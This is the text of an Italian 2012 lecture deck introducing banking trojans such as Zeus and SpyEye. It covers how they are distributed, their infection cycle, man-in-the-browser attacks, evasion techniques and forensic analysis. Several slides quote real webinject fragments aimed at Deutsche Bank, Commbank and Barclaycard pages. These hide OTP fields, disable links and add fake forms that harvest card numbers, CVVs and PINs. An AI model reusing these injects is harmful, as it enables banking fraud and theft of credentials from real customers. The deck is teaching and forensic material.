Malware Bancario
INTRODUZIONE AL CRIMEWARE
NEL
SETTORE BANCARIO
PRESI NELLA RETE - COLLEGIO GHISLIERI
23 NOVEMBRE 2012
Dott. Francesco Schifilliti
COS’È
UN
BANKING TROJAN?
This term refers to the subset of malware seeking
to steal/theft data from electronic bank accounts.
Within this context, other financial services such
as, for instance, online stock exchange operations
are also considered electronic banking.
001
Zeus, SpyEye… e tanti altri
002
Soggetti (minimi) Coinvolti
003
Malware Developing
004
Malware Distribution
?
User
005
Malware Distribution
Pay-per-Install
Drive-by-Download
Exploit-as-a-Services
006
Ciclo Pay-per-Install
Exploit-as-a-Services
007
Fase di Infezione e Controllo
Infection
Mail di
Spam
Compromised
Web Site
Exploit Pack
<script
var a=
var xl
if(xls
John Doe: Victim
Infection
008
Iterando il processo d’Infezione…
Flat Botnet
P2P Botnet
009
Ciclo d’Infezione di un Malware sul PC
Infezione sul
Disco
Rendere
‘Persistent’
il MW
(ad es. SpyEye
copia il file
C:\cleansweep.ex
e)
(ad es. con la
modifica del
registry)
Injection
Estensione
della
Injection
(generalmente
sul processo
Explorer)
(generalmente
con tecniche di
Hooking in
Userland)
Connessione
persistente
col Server di
C&C
010
Odore di $$$
data theft
User
data &
session theft
011
Man in the Browser
012
Anti-Detection/Deception Techniques MW Code
Anti Memory
Anti Emulation
Anti Debugging
Anti Disassembler
Cryptography
Packing & Protecting
Obfuscation
013
Struttura di SpyEye
C&C
Packer
Obfuscation
Anti-Dbg
Plugin del Malware:
Binary
•
•
•
•
P
config.dat, ccgrabber
collectors, sock5
customconnector
webinjectors.txt
014
Un pezzettino di Webinjector di uno SpyEye 10.7
…..
set_url *meine.deutsche-bank.de/trxm/db/*european.transfer.enter.data* GP
data_before
<body
data_end
data_inject
style="visibility:hidden”
data_end
data_after
id=
data_end
data_before
</body>
data_end
data_inject
<script src='/error.html/trxm1/dbb.do?act=getall&domain=DB'></script>
<script src='/error.html/trxm1/dbcommon.js'></script>
<script src='/error.html/trxm1/dbsepa.js'></script>
<script>if (typeof _n_ck == "undefined"){document.body.style.visibility =
'visible';}</script>
data_end
data_after
</html>
data_end
…..
015
Un pezzettino di Webinjector di un ATS
…..
set_url *commbank.com.au/netbank/UserMaintenance* GP
data_before
<h1 class="PageTitle">*My Q*</h1>
data_end
data_inject
<script language="javascript" type="text/javascript”>
window.onload = function() {
for ( i=0; i < document.links.length; i++ )
if (document.links[i].id != 'H_LogOffLink' && document.links[i].id !=
'ctl00_HeaderControl_LogOffLink’)
document.links[i].onclick = function() { return false; };
};
</script>
<script language="javascript" type="text/javascript”>
var clck_counter = 0;
function msg()
{
clck_counter++;
if (clck_counter==2)
{
document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.visibility =
"hidden”;
document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.display = "none
document.getElementById('ctl00_BodyPlaceHolder_btnGenSMS_field').disabled = true;
document.getElementById('error').style.top = 42;
document.getElementById('error').style.left = 42;
document.getElementById('error').style.visibility = "visible”;
document.getElementById('error').style.display = "block”;
}
return false;
}
016
Webinject in Chiaro nella RAM
https://bcol.barclaycard.co.uk*cardSummary*∏‹∏:](ÈÈÈ∏Í∏Í√
<style type="text/css">
#inject { display: none; }
.ui-dialog { width: 400px; font-size: 11px; }
.ui-dialog .ui-dialog-titlebar-close { visibility: hidden; }
.ui-dialog .ui-dialog-titlebar { visibility: hidden; display: none; }
</style>Pfiıº| ÓΩ|HÓΩ|pÓΩ|òÓ≤ıº|¿ÓΩ|ËÓ∏˘º|Ô˙º|8Ô˙º|`ÔπàÔπ∞Ô∫ÿÔ∫–·∞Ô
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js"></script>
value=unescape(document.cookie.substring(offset, end))
jQuery("#inject_cc").focus();
}
else if (jQuery("#inject_expdate_mm").val().length < 2)
{
alert('Please enter Exp.Date');
jQuery("#inject_expdate_mm").focus();
}
else if (jQuery("#inject_expdate_yy").val().length < 2)
{
alert('Please enter Exp.Date');
jQuery("#inject_expdate_yy").focus();
}
else if (jQuery("#inject_cvv").val().length < 3)
{
alert('Please enter correct CVV');
jQuery("#inject_cvv").focus();
}
else if (jQuery("#inject_pin").val().length < 5)
{
…….
017
SpyEye: esempio di MW modulare e parametrico
Cosa/Come Rubare è definito in base
ai Plugin Installati sulla Bot.
billinghammer.dll_5f00ca74679332c15ebe2e682a19e8c9
bugreport.dll_a6c1992119c1550db437aac86d4ffdad
ccgrabber.dll_5b1593855a6e8f01468878eb88be39df
creditgrab.dll_0e0c1855fa82ca3ad20bbe30106657b2
ffcertgrabber.dll_6b5ffc56cec8f60a448fe7a9044625a5
Plugin_CreditGrab.dll_0e0c1855fa82ca3ad20bbe30106657b2
rdp.dll_0cb722049e024f2366ba9c187cb3929f
ddos.dll_716d82810241daa5e2a41327014e9a77
…
su Quale Banca/Ist. Finanziario
fare operazioni in Frode è
definito in webinjectors.txt
User
a Chi Trasmettere i dati collezionati
dal MW è definito in collectors.txt
018
Uno Schema di Riferimento dell’Analisi
Forensic
Ananlysis
Disk
Analysis
MW
Searching
Reg.
Analysis
Browser
Analysis
Live Analysis
MW Analysis
File Analysis
Hash
Comparing
De- AntiXYZ
Disassebling
Debugging
Memory
Dumping
Network
Analysis
Memory
Analysis
Entropy
Analysis
PIENA COMPRENSIONE DEL FORENSIC ARTIFACT
019
GRAZIE
Francesco Schifilliti
[email protected]
Scarica
